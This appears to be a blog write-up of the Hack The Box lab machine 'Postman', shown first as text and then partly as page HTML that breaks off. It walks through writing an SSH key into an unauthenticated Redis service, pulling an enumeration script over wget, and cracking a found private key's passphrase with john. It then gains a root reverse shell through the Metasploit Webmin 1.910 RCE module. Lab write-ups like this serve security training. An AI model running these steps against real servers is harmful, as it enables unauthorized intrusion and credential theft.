ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519) 80/tcp open http? 10000/tcp open http MiniServ 1.910 (Webmin httpd) |_http-title: Site doesn&#39;t have a title (text/html; Charset=iso-8859-1). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 269.64 seconds Enumeration Not much can be done with the ssh service as we do not have any credentials on hand so lets come back to it later. As for the http service, maybe we can find some information on it ? Seems like an online portfolio or blog. There isn’t much to look at though so lets brute force the directories. 1 2 3 4 5 6 7 $ gobuster dir -u http://postman.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -q /images (Status: 301) /upload (Status: 301) /css (Status: 301) /js (Status: 301) /fonts (Status: 301) /server-status (Status: 403) /upload seemed interesting but it was just a bunch of images. Seems like a dead end. Lets try expanding our range of ports to scan. 1 2 3 4 5 6 7 8 9 10 11 12 $ nmap -sS -p 1-65535 postman.htb Nmap scan report for postman.htb (10.10.10.160) Host is up (0.26s latency). Not shown: 65531 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 6379/tcp open redis 10000/tcp open snet-sensor-mgmt Nmap done: 1 IP address (1 host up) scanned in 4548.36 seconds Ooo 2 more ports appeared! Lets check out the redis service on port 6379. I came across this article on how to get myself a remote shell to the box. The first step was to check if authentication is required. Using nc, I attempted to send a echo command and it was executed successfully. 1 2 3 4 5 6 7 nc -v postman.htb 6379 postman.htb [10.10.10.160] 6379 (?) open echo &quot;Authentication required?&quot; $24 Authentication required? quit +OK As you can see, the redis service echoed back our text. Remember that there was a ssh service running on the box? Lets generate a new ssh key and attempt to write it onto the machine. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ssh-keygen -t rsa Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /root/.ssh/id_rsa. Your public key has been saved in /root/.ssh/id_rsa.pub. The key fingerprint is: SHA256:TEPWxxvFEd9AoEM+xQGEYHHyVHuUeSugqKuFihcLCf4 root@kali The key&#39;s randomart image is: +---[RSA 3072]----+ | =o===+=O*o | | . B.oo=B oo.| | .+.*o.+ .o| |. .o.. +o . | |o. . S . | |o.... | | .oo.. | |..oE. | |o... | +----[SHA256]-----+ We then have to prepare the public key to be sent to the redis server. 1 $ (echo -e &quot;\\n\\n&quot;; cat ~/.ssh/id_rsa.pub; echo -e &quot;\\n\\n&quot;) &gt; foo.txt Using redis-cli, we connect to the redis server and print the current working directory as well as the location of where the database will be saved to. 1 2 3 4 5 6 7 redis-cli -h postman.htb postman.htb:6379&gt; config get dir 1) &quot;dir&quot; 2) &quot;/var/lib/redis/.ssh&quot; postman.htb:6379&gt; config get dbfilename 1) &quot;dbfilename&quot; 2) &quot;authorized_keys&quot; Alright, we are in the correct directory already and the the database will be written to authorized_keys when we save. Next we need to clear the database, write our key into it and then save it. 1 2 3 4 5 6 $ redis-cli -h postman.htb flushall OK $ cat foo.txt | redis-cli -h postman.htb -x set crackit OK $ redis-cli -h postman.htb save OK Now if try to ssh as the redis user using the ssh key we made, 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ssh -i ~/.ssh/id_rsa redis@postman.htb Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Tue Dec 31 09:16:39 2019 from 10.10.XX.XX redis@Postman:~$ Success! Too bad redis wasn’t the user that has the flag :P If we list /home, we see another user called Matt. 1 2 redis@Postman:~$ ls /home Matt Lets see if running ‘LinEnum’ will give us any insights on how to get access to Matt. I will be starting a web server on my machine using the builtin SimpleHTTPServer module in python and use wget to retrieve it. 1 2 3 4 5 $ mkdir httpserver $ cd httpserver $ cp ~/LinEnum.sh . $ python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ... 1 2 3 4 5 6 7 8 9 10 11 redis@Postman:~$ wget http://10.10.XX.XX/LinEnum.sh --2019-12-31 10:18:04-- http://10.10.XX.XX/LinEnum.sh Connecting to 10.10.XX.XX:80... connected. HTTP request sent, awaiting response... 200 OK Length: 46476 (45K) [text/x-sh] Saving to: ‘LinEnum.sh’ LinEnum.sh 100%[=============================================&gt;] 45.39K 59.1KB/s in 0.8s 2019-12-31 10:18:05 (59.1 KB/s) - ‘LinEnum.sh’ saved [46476/46476] Running LinEnum.sh shows that there is a ssh private key backup in /opt named id_rsa.bak owned by user Matt. Interesting… 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 redis@Postman:~$ ./LinEnum.sh ... [-] Location and Permissions (if accessible) of .bak file(s): -rwxr-xr-x 1 Matt Matt 1743 Aug 26 00:11 /opt/id_rsa.bak -rw------- 1 root root 695 Aug 25 21:24 /var/backups/group.bak -rw------- 1 root shadow 577 Aug 25 21:24 /var/backups/gshadow.bak -rw------- 1 root shadow 935 Aug 26 03:50 /var/backups/shadow.bak -rw------- 1 root root 1382 Aug 25 23:48 /var/backups/passwd.bak ... redis@Postman:~$ cat /opt/id_rsa.bak redis@Postman:~$ cat /opt/id_rsa.bak -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2 7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6 cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9 1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS 5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6 jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X 0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+ Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw== -----END RSA PRIVATE KEY----- With this private ssh key, we could try to ssh as Matt. 1 2 $ ssh -i id_rsa.bak Matt@postman.htb Enter passphrase for key &#39;id_rsa.bak&#39;: Seems like we need a passphrase. Lets see if we can crack it with john. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 $ python ssh2john.py id_rsa.bak &gt; matt.hash $ john --wordlist=/usr/share/wordlists/rockyou.txt matt.hash Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes Cost 2 (iteration count) is 2 for all loaded hashes Will run 4 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press &#39;q&#39; or Ctrl-C to abort, almost any other key for status computer2008 (matt) Warning: Only 2 candidates left, minimum 8 needed for performance. 1g 0:00:00:04 DONE (2019-12-31 05:57) 0.2083g/s 2987Kp/s 2987Kc/s 2987KC/sa6_123..*7¡Vamos! Session completed With the passphrase, lets try to ssh as Matt again. 1 2 3 $ ssh -i id_rsa.bak Matt@postman.htb Enter passphrase for key &#39;id_rsa.bak&#39;: Connection closed by 10.10.10.160 port 22 What is going on? We are immediately getting disconnected. After some trials, I kind of gave up and decided to move on to the next service at port 10000. Hmm lets shift to HTTPS. We are immediately greeted with a login page. Lets try to login using Matt:computer2008 as our credentials. Ooo it seems like a dashboard that monitors the Webmin service. After looking around, there doesn’t seem to be any place where we attack from. Lets see if we can find any exploits using searchsploit. 1 2 3 4 5 6 7 8 9 10 $ searchsploit webmin -------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) -------------------------------------------------------------------------- ---------------------------------------- ... Webmin 1.910 - &#39;Package Updates&#39; Remote Command Execution (Metasploit) | exploits/linux/remote/46984.rb ... -------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result Exploitation Hmm from the nmap results and the dashboard, we can tell that the version of Webmin is 1.910, hence we will use the exploit whose target version is nearest to it. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 $ msfconsole msf5 &gt; use exploit/linux/http/webmin_packageup_rce msf5 exploit(linux/http/webmin_packageup_rce) &gt; set LHOST 10.10.XX.XX LHOST =&gt; 10.10.XX.XX msf5 exploit(linux/http/webmin_packageup_rce) &gt; set RHOSTS postman.htb RHOSTS =&gt; postman.htb msf5 exploit(linux/http/webmin_packageup_rce) &gt; set USERNAME Matt USERNAME =&gt; Matt msf5 exploit(linux/http/webmin_packageup_rce) &gt; set PASSWORD computer2008 PASSWORD =&gt; computer2008 msf5 exploit(linux/http/webmin_packageup_rce) &gt; run *] Started reverse TCP handler on 10.10.XX.XX:1337 [+] Session cookie: 169f13b0b46f82aeea5f5ea57524526f [*] Attempting to execute the payload... [*] Command shell session 2 opened (10.10.XX.XX:4444 -&gt; 10.10.10.160:55156) at 2019-12-31 07:50:17 -0500 There’s no prompt but lets try to upgrade to a tty shell. 1 2 3 4 python -c &#39;import pty; pty.spawn(&quot;/bin/bash&quot;)&#39; root@Postman:/usr/share/webmin/package-updates/# id id uid=0(root) gid=0(root) groups=0(root) Oh damn! We are already root! Getting both the user and root flags should be no problem now. user.txt(1) 1 2 3 root@Postman:/usr/share/webmin/package-updates/# cat /home/Matt/user.txt cat /home/Matt/user.txt 517aXXXXXXXXXXXXXXXXXXXXXXXXXXXX root.txt 1 2 3 root@Postman:/usr/share/webmin/package-updates/# cat /root/root.txt cat /root/root.txt a257XXXXXXXXXXXXXXXXXXXXXXXXXXXX user.txt(2) Turns out sshing as the user isn’t the only way to remotely access it. Running su allowed us login at Matt. 1 2 3 4 redis@Postman:~$ su Matt Password: Matt@Postman:/var/lib/redis$ cat ~/user.txt 517aXXXXXXXXXXXXXXXXXXXXXXXXXXXX Rooted ! Thank you for reading and look forward for more writeups and articles !","url":"https://rizemon.github.io/posts/postman-htb/","@type":"BlogPosting","headline":"Hack The Box - Postman","dateModified":"2021-01-03T20:34:47+08:00","datePublished":"2020-03-15T11:33:00+08:00","@context":"https://schema.org"}</script><title>Hack The Box - Postman | rizemon's blog</title><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="preload" href="/assets/css/post.css" as="style"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script defer src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script async src="/assets/js/post.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id="></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', ''); }); </script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src="/assets/portfolio.png" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">rizemon's blog</a></div><div class="site-subtitle font-italic">Cyber Security Enthusiast.</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/tabs/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tabs/tags/" class="nav-link"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/tabs/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/tabs/about/" class="nav-link"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT ME</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center"> <a href="https://github.com/rizemon" aria-label="github" class="order-3" target="_blank" rel="noopener"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/rizemon" aria-label="twitter" class="order-4" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['',''].join('@')" aria-label="email" class="order-5" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" class="order-6" > <i class="fas fa-rss"></i> </a> <span class="icon-border order-2"></span> <span id="mode-toggle-wrapper" class="order-1"> <i class="mode-toggle fas fa-adjust"></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.updateMermaid(); }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer) ) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } updateMermaid() { if (typeof mermaid !== "undefined") { let expectedTheme = (this.modeStatus === ModeToggle.DARK_MODE? "dark" : "default"); let config = { theme: expectedTheme }; /* re-render the SVG › <https://github.com/mermaid-js/mermaid/issues/311#issuecomment-332557344> */ $(".mermaid").each(function() { let svgCode = $(this).prev().children().html(); $(this).removeAttr("data-processed"); $(this).html(svgCode); }); mermaid.initialize(config); mermaid.init(undefined, ".mermaid"); } } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } this.updateMermaid(); } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>Hack The Box - Postman</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Hack The Box - Postman</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Sun, Mar 15, 2020, 11:33 AM +0800" > Mar 15, 2020 <i class="unloaded">2020-03-15T11:33:00+08:00</i> </span> by <span class="author"> rizemon </span></div><div> <span> Updated <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Sun, Jan 3, 2021, 8:34 PM +0800" > Jan 3, 2021 <i class="unloaded">2021-01-03T20:34:47+08:00</i> </span> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1739 words">9 min</span></div></div><div class="post-content"><p>Despite the name of this box, it was nowhere related to <a href="https://www.getpostman.com/">Postman</a>! This box was quite weird as I actually jumped straight to root instead of going to user first.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/postman.png" alt="" height="414px" width="615px" /></p><h1 id="configuration">Configuration</h1><p>The operating systems that I will be using to tackle this machine is a Kali Linux VM.</p><p>What I learnt from other writeups is that it was a good habit to map a domain name to the machine’s IP address so as that it will be easier to remember. This can done by appending a line to <code class="language-plaintext highlighter-rouge">/etc/hosts</code>.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nv">$ </span><span class="nb">echo</span> <span class="s2">"10.10.10.160 postman.htb"</span> <span class="o">&gt;&gt;</span> /etc/hosts
</pre></table></code></div></div><h1 id="reconnaissance">Reconnaissance</h1><p>Using <code class="language-plaintext highlighter-rouge">nmap</code>, we are able to determine the open ports and running services on the machine.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre><td class="rouge-code"><pre><span class="nv">$ </span>nmap <span class="nt">-sV</span> <span class="nt">-sT</span> <span class="nt">-sC</span> postman.htb
Starting Nmap 7.70 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2019-11-09 01:39 EST
Nmap scan report <span class="k">for </span>postman.htb <span class="o">(</span>10.10.10.160<span class="o">)</span>
Host is up <span class="o">(</span>0.26s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 997 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 <span class="o">(</span>RSA<span class="o">)</span>
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp    open  http?
10000/tcp open  http    MiniServ 1.910 <span class="o">(</span>Webmin httpd<span class="o">)</span>
|_http-title: Site doesn<span class="s1">'t have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 269.64 seconds

</span></pre></table></code></div></div><h1 id="enumeration">Enumeration</h1><p>Not much can be done with the <code class="language-plaintext highlighter-rouge">ssh</code> service as we do not have any credentials on hand so lets come back to it later. As for the <code class="language-plaintext highlighter-rouge">http</code> service, maybe we can find some information on it ?</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/postman1.png" alt="" /></p><p>Seems like an online portfolio or blog. There isn’t much to look at though so lets brute force the directories.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre><span class="nv">$ </span>gobuster <span class="nb">dir</span> <span class="nt">-u</span> http://postman.htb <span class="nt">-w</span> /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt <span class="nt">-t</span> 20 <span class="nt">-q</span>
/images <span class="o">(</span>Status: 301<span class="o">)</span>
/upload <span class="o">(</span>Status: 301<span class="o">)</span>
/css <span class="o">(</span>Status: 301<span class="o">)</span>
/js <span class="o">(</span>Status: 301<span class="o">)</span>
/fonts <span class="o">(</span>Status: 301<span class="o">)</span>
/server-status <span class="o">(</span>Status: 403<span class="o">)</span>
</pre></table></code></div></div><p><code class="language-plaintext highlighter-rouge">/upload</code> seemed interesting but it was just a bunch of images.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/postman2.png" alt="" /></p><p>Seems like a dead end. Lets try expanding our range of ports to scan.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre><span class="nv">$ </span>nmap <span class="nt">-sS</span> <span class="nt">-p</span> 1-65535 postman.htb
Nmap scan report <span class="k">for </span>postman.htb <span class="o">(</span>10.10.10.160<span class="o">)</span>
Host is up <span class="o">(</span>0.26s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
6379/tcp  open  redis
10000/tcp open  snet-sensor-mgmt

Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>4548.36 seconds

</pre></table></code></div></div><p>Ooo 2 more ports appeared! Lets check out the <code class="language-plaintext highlighter-rouge">redis</code> service on port <code class="language-plaintext highlighter-rouge">6379</code>. I came across this article on how to get myself a remote shell to the box.</p><p>The first step was to check if authentication is required. Using <code class="language-plaintext highlighter-rouge">nc</code>, I attempted to send a <code class="language-plaintext highlighter-rouge">echo</code> command and it was executed successfully.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>nc <span class="nt">-v</span> postman.htb 6379
postman.htb <span class="o">[</span>10.10.10.160] 6379 <span class="o">(</span>?<span class="o">)</span> open
<span class="nb">echo</span> <span class="s2">"Authentication required?"</span>
<span class="nv">$24</span>
Authentication required?
quit
+OK
</pre></table></code></div></div><p>As you can see, the <code class="language-plaintext highlighter-rouge">redis</code> service echoed back our text. Remember that there was a <code class="language-plaintext highlighter-rouge">ssh</code> service running on the box? Lets generate a new <code class="language-plaintext highlighter-rouge">ssh</code> key and attempt to write it onto the machine.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre><td class="rouge-code"><pre>ssh-keygen <span class="nt">-t</span> rsa
Generating public/private rsa key pair.
Enter file <span class="k">in </span>which to save the key <span class="o">(</span>/root/.ssh/id_rsa<span class="o">)</span>: 
Enter passphrase <span class="o">(</span>empty <span class="k">for </span>no passphrase<span class="o">)</span>: 
Enter same passphrase again: 
Your identification has been saved <span class="k">in</span> /root/.ssh/id_rsa.
Your public key has been saved <span class="k">in</span> /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:TEPWxxvFEd9AoEM+xQGEYHHyVHuUeSugqKuFihcLCf4 root@kali
The key<span class="s1">'s randomart image is:
+---[RSA 3072]----+
|      =o===+=O*o |
|     . B.oo=B oo.|
|       .+.*o.+ .o|
|.     .o.. +o .  |
|o.   .  S    .   |
|o....            |
| .oo..           |
|..oE.            |
|o...             |
+----[SHA256]-----+
